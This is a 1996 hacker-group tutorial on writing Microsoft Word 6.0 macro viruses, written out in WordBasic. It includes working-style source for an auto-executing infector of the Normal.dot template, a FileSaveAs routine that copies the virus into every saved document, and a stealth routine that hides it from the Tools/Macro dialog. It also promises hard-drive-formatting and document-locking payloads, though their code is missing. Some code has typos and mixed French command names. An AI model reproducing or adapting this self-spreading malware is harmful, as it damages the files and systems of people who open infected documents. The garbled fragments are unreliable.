***************************
* THE MACRO VIRUS *
* WRITING TUTORIAL *
* PART 1 *
***************************
* *
* WRITTEN BY DARK NIGHT *
* OF VBB *
* *
***************************
LEGALESE
--------
I SHALL NOT BE HELD RESPONSIBLE FOR ANY DAMAGE CREATED BE DIRECT OR INDIRECT
USE OF THE PUBLICISED MATERIAL. THIS DOCUMENT IS COPYRIGHT 1996 TO ME,
DARK NIGHT OF VBB. HEREWITH I GRANT ANYBODY LICENSE TO REDISTRIBUTE THIS
DOCUMENT AS LONG AS IT IS KEPT IN WHOLE AND MY COPYRIGHT NOTICE IS NOT
REMOVED. ALSO IF I FIND ANY LAMERS WHO JUST TAKE THE CODE PUBLISHED HERE
AND SAY IT IS THEIR OWN I WILL SEE THAT THEY'LL BE PUNISHED.(BELIEVE IT OR
NOT :-))!!!
INTRODUCTION
-------------
MANY OF YOU MAY BE WONDERING RIGHT NOW WHO THE HELL I AM AND WHO VBB IS.
COME ON LAMERS! GET ALIVE. VBB IS ONE OF THE COOLEST VIRUS GROUPS AROUND.
YOU CAN'T TELL ME YOU'VE NEVER HEARD OF US. WELL, OK I'LL ADMIT IT. WE'RE
NOT THAT POPULAR YET, BUT THAT'LL COME. SO FOR NOW HERE'S MY CONTRIBUTION
TO THE GROUP AS THE LEADER. WELCOME TO THE MACRO VIRUS WRITING TUTORIAL
PART 1!
ENJOY!!
THE TOOLS
----------
FIRST OF ALL YOU'LL NEED MS WORD 6.0 OR UP(DUH), THEN YOU MAY WANT TO GET
VBB'S MACRO DISASSEMBLER BY AURODREPH SO THAT YOU CAN STUDY ENCRYPTED MACROS.
ALSO YOU SHOULD MAKE BACK-UPS OF YOUR NORMAL.DOT TEMPLATE IN YOUR
WINWORD6\TEMPLATE\ DIRECTORY, AS THIS IS THE DOCUMENT COMMONLY INFECTED BY
MACRO VIRII. SO WHATCH OUT. ALSO I RECOMMEND TO HAVE AT LEAST A SMALL
KNOWLEDGE OF WORD BASIC, SO THAT YOU KIND A KNOW WHAT'S GOING ON. WELL,
THAT'S IT. YOU'VE MADE IT THIS FAR. IT'S NOW TIME TO GET INTO THE MACRO
VIRUS GENERALS.
THE GENERAL STUFF
-----------------
MOST MACRO VIRII HAVE A PRETTY SET STRUCTURE. THEY START OF WITH AN
AUTO-EXECUTING MACRO WHICH INFECTS THE NORMAL.DOT(GLOBAL) TEMPLATE. THEN
THEY HAVE SOME MACROS WHICH WILL INFECT THE FILES ON CERTAIN ACTIONS. FOR
EXAMPLE FileSaveAs, FileSave, FileOpen, ToolsMacros. DOCUMENTS ARE INFECTED
THROUGH TRANSFERRING THE MACROS INTO THE DOCUMENT AND HAVING THEM EXECUTE THE
NEXT TIME THE DOCUMENT IS OPENED. A CODE FOR THE AUTOEXEC ROUTINE WOULD LOOK
SOMETHING LIKE THIS:
'ANYTHING AFTER THE ' ARE MY COMMENTS
Sub MAIN
On Error Goto Abort
iMacroCount = CountMacros(0, 0)
'CHECK TO SEE IF INFECTION EXISTS
For i = 1 To iMacroCount
If MacroName$(i, 0, 0) = "PayLoad" Then
bInstalled = - 1
'BY LOOKING FOT THE PAYLOAD MACRO
End If
If MacroName$(i, 0, 0) = "FileSaveAs" Then
bTooMuchTrouble = - 1
'BUT IF THE FILESAVEAS MACRO EXISTS THEN INFECTION IS
'TOO DIFICULT.
End If
Next i
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoExec and FileSaveAs.
'Payload has no use except to check for infection.
'The ,1 encrypts all macros in their destination making
'them unreadble in Word.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
Macro$ = sMe$ + ":PayLoad"
MacroCopy Macro$, "Global:PayLoad", 1
Macro$ = sMe$ + ":FileOpen"
MacroCopy Macro$, "Global:FileOpen", 1
Macro$ = sMe$ + ":FileSaveAs"
MacroCopy Macro$, "Global:FileSaveAs", 1
Macro$ = sMe$ + ":AutoExec"
MacroCopy Macro$, "Global:AutoExec", 1
SetProfileString "WW6I", Str$(iWW6IInstance + 1)
End If
Abort:
End Sub
THE SaveAs ROUTINE
------------------
THIS IS THE ROUTINE WHICH COPIES THE MACRO VIRUS INTO THE ACTIVE DOCUMENT
WHEN IT IS SAVED USING FILE/SAVE AS. IT USES MUCH OF THE SAME TECHNIQUES AS
THE AutoExec ROUTINE. HERE'S WHAT THE CODE SHOULD LOOK LIKE FOR THE SaveAs
ROUTINE:
'YOU CAN ALWAYS USE THE ,1 AGAIN TO ENCRYPT MACROS.
Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (dlg.Format = 1) Then
MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs"
MacroCopy "FileSave ", WindowName$() + ":FileSave"
MacroCopy "PayLoad", WindowName$() + ":PayLoad"
MacroCopy "FileOpen", WindowName$() + ":FileOpen"
Dlg.Format = 1
End If
FileDaveAs dlg
End Sub
SHORT, BUT IT WORKS WELL. ALL THIS INFO, BELIEVE IT OR NOT, IS ENOUGH
TO MAKE A SMALL AND BASIC MACRO VIRUS.
SPECIAL ROUTINES
----------------
THERE ARE SEVERAL METHODS WHICH CAN BE USED TO HIDE YOUR VIRUS OR MAKE IT
MORE EFFECTIVE. FOR EXAMPLE, YOU CAN MAKE A MACRO TO HIDE YOUR VIRUS WHEN
SOMEBODY LOOKS IN TOOLS/MACRO. THE CODE SHOULD LOOK SOMETHING LIKE THIS:
Sub MAIN
On Error Goto ErrorRoutine
OldName$ = NomFichier$()
If macros.bDebug Then
MsgBox "start ToolsMacro"
Dim dlg As OutilsMacro
If macros.bDebug Then MsgBox "1"
GetCurValues dlg
If macros.bDebug Then MsgBox "2"
On Error Goto Skip
Dialog dlg
OutilsMacro dlg
Skip:
On Error Goto ErrorRoutine
End If
ErrorRoutine:
On Error Goto Done
If macros.bDebug Then
MsgBox "error " + Str$(Err) + " occurred"
End If
Done:
End Sub
ALSO YOU CAN INCLUDE EXERNAL SUBROUTINES. FOR EXAMPLE, THE NUCLEAR VIRUS
TRIES TO COMPILE AND RUN AN EXTERNAL FILE-INFECTOR VIRUS. OR SOME MACRO
TROJANS TRY TO FORMAT YOUR HARDDRIVE WHEN YOU OPEN A DOCUMENT. AN EXAMPLE
SUBROUTINE FOR AN UNCONDITIONAL FORMAT WOULD BE THIS:
ALSO YOU MAY WANT TO PUT A PASSWORD ONTO THE DOCUMENT THAT YOU'VE JUST
INFECTED OR WHEN YOU HAVE EXPERIENCED AN ERROR WHILE INFECTING AND THE
CURRENT SECOND IS 13. TAKE A LOOK AT THIS EXAMPLE:
